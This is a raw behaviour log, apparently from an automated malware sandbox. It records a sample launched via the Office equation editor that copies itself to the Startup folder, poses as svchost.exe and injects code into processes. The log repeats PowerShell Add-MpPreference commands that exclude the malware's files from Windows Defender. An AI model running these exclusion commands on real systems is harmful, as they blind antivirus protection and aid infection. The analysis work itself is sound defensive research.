                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\srt.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\srt.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\srt.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\srt.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\srt.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\srt.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\AppData\Roaming\srt.exeMemory written: C:\Users\user\AppData\Roaming\srt.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeMemory written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exeMemory written: unknown base: 400000 value starts with: 4D5A
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\srt.exe C:\Users\user\AppData\Roaming\srt.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\srt.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\srt.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\srt.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Users\user\AppData\Roaming\srt.exe C:\Users\user\AppData\Roaming\srt.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\srt.exeQueries volume information: C:\Users\user\AppData\Roaming\srt.exe VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
